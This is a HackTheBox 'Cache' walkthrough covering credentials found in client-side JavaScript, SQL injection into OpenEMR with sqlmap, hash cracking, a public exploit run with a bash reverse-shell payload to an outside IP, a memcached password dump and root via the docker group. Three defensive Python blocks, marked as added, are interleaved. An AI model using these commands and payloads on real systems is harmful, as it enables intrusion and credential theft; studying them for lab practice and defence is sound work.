
HackTheBox: Cache


Enumeration:

Started by enumerating ports with nmap:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.10.188 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 11:23 CEST
Nmap scan report for 10.10.10.188
Host is up (0.013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

After some manual enumeration, noticed that the login page does not send any request to verify the login.
Keeping that in mind, looked for where the check is stored and found it in http://cache.htb/jquery/functionality.js:

$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});
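The hardened form of the check above, as an added example that is not part of the original post: the credential check moves server-side, the password is stored only as a salted scrypt hash, and the comparison is constant-time. The user name, password and user store are constructed for the example.

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Return (salt, scrypt_hash); a fresh 16-byte salt is drawn when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=2 ** 14, r=8, p=1, dklen=32)
    return salt, digest

# Constructed user store for this example (not the box's real account): the server
# keeps only salt + hash per user, so nothing shipped to the browser reveals a password.
USERS = {"ash": hash_password("correct horse battery staple")}

# Dummy record used for unknown user names so that a bad user name costs the same
# scrypt work as a bad password (no timing-based user enumeration).
_DUMMY = hash_password("placeholder-not-a-real-password")

def verify_login(username, password):
    """Server-side replacement for the page's client-side check.

    Called by the POST handler of the login form; the browser only submits the
    form and never learns the expected values."""
    salt, expected = USERS.get(username, _DUMMY)
    _, actual = hash_password(password, salt)
    # Constant-time comparison: no early exit on the first mismatching byte.
    matches = hmac.compare_digest(actual, expected)
    return matches and username in USERS
```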

Logged in with the credentials and got redirected to http://cache.htb/net.html. Found nothing else with those credentials, but kept them in case they are reused.

Then had a look at the author page:
Author

It looks like it is using Virtual Hosting, and there is another project called HMS (Hospital Management System). Then added the following lines to /etc/hosts:

10.10.10.188      cache.htb
10.10.10.188      hms.htb

Intrusion:

After editing /etc/hosts opened hms.htb:
OpenEMR

It looks like a CMS, so searched for public exploits or vulnerabilities and found an SQL injection that allows us to get RCE. Then followed the guide:

  1. Captured with BurpSuite a request to http://hms.htb/portal/add_edit_event_user.php?eid=1 and saved it to a file.
    BurpSuite
  2. Enumerated the databases sqlmap -r request.txt --dbs --batch.
  3. Enumerated the tables sqlmap -r request.txt -D openemr --tables --batch.
  4. Listed the table “users_secure” sqlmap -r ~/Downloads/request.txt -D openemr -T users_secure --dump --batch.
  5. Then got the user and a hash, added the hash to a file and cracked it with JohnTheRipper john hash.txt -w"rockyou.txt".
  6. Downloaded the exploit searchsploit -m 45161.
  7. Listened on port 443 for opening connections rlwrap nc -lvp 443.
  8. On another terminal ran the script python 45161.py -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.15.245/443 0>&1' http://hms.htb

Got a shell as www-data, then reused the credentials found on cache.htb to switch to the user "ash".

Privesc:

Listed the users:

ash@cache:~$ awk -F: '($3 >=1000) && ($3 <= 1100) {print $1,$3}' /etc/passwd
ash 1000
luffy 1001

After some enumeration, checked the listening ports:

ash@cache:~$ netstat -tulnp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

Port 11211 is listening, which is Memcached's default port, so enumerated the data stored in it:

ash@cache:~$ telnet localhost 11211

Listed all items:

stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 19
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 68
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 810
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

Dumped the keys stored in slab class 1:

stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

Finally got the password field:

get passwd
VALUE passwd 0 9
0n3_p1ec3
END
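An added audit helper, not from the original post, that parses the cachedump output shown above and flags keys whose names suggest credentials, reporting whether the item never expires (the "0 s" field). The list of suspicious name patterns is an assumption; the sample input is the page's own cachedump listing.

```python
import re

# The "stats cachedump 1 0" output from this page, embedded as sample input.
SAMPLE_CACHEDUMP = """\
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
"""

# memcached prints each key as: ITEM <key> [<size> b; <expiry-epoch> s]
_ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
# Assumed list of key-name fragments that usually mean a secret is cached in the clear.
_SENSITIVE = re.compile(r"pass|pwd|secret|token|account|cred|apikey", re.IGNORECASE)

def parse_cachedump(text):
    """Parse cachedump lines into (key, size_bytes, expiry_epoch) tuples; stop at END."""
    items = []
    for line in text.splitlines():
        line = line.strip()
        if line == "END":
            break
        m = _ITEM_RE.match(line)
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items

def find_sensitive_items(text):
    """Return (key, size, never_expires) for keys whose names look like credentials.

    An expiry of 0 means memcached keeps the value until evicted, so a secret
    written once stays readable by anyone who can reach port 11211 on the host."""
    findings = []
    for key, size, expiry in parse_cachedump(text):
        if _SENSITIVE.search(key):
            findings.append((key, size, expiry == 0))
    return findings
```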

Escalated privileges to "luffy" with that password and checked which groups we are in:

luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

As we are in the docker group and can run containers, let's see if there is any Docker image:

luffy@cache:~$ docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        10 months ago       64.2MB

All we have to do to get root is run a container with the whole host filesystem mounted inside it:

luffy@cache:~$ docker run -v /:/mnt/pwned -ti ubuntu
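An added check, not from the original post, that a defender can run over /etc/passwd and /etc/group to find accounts whose group membership is root-equivalent, as luffy's docker membership is here. The sample files are constructed after this box's accounts, and the set of flagged groups is an assumption.

```python
# Constructed /etc/passwd and /etc/group snippets modelled on the box's accounts.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000::/home/ash:/bin/bash
luffy:x:1001:1001::/home/luffy:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
docker:x:999:luffy
ash:x:1000:
luffy:x:1001:
"""

# Assumed set of groups whose members can reach root: docker (bind-mount / into a
# container, as this page shows), lxd (same trick with LXD) and disk (raw block devices).
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk"}

def parse_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def parse_passwd(text):
    """Map user name -> primary gid."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users

def root_equivalent_members(passwd_text, group_text):
    """Return {user: sorted group names} for non-root users who are in a flagged
    group, either listed in /etc/group or via their primary gid in /etc/passwd."""
    groups = parse_group(group_text)
    users = parse_passwd(passwd_text)
    findings = {}
    for gname in ROOT_EQUIVALENT_GROUPS & set(groups):
        gid, members = groups[gname]
        for user in members | {u for u, pg in users.items() if pg == gid}:
            if user != "root":
                findings.setdefault(user, []).append(gname)
    return {u: sorted(g) for u, g in findings.items()}
```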

Resources

https://en.wikipedia.org/wiki/Virtual_hosting#:~:text=Virtual%20hosting%20is%20a%20method,use%20the%20same%20host%20name.
https://www.youtube.com/watch?v=DJSQ8Pk_7hc
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
https://root4loot.com/post/docker-privilege-escalation/


Written by ITasahobby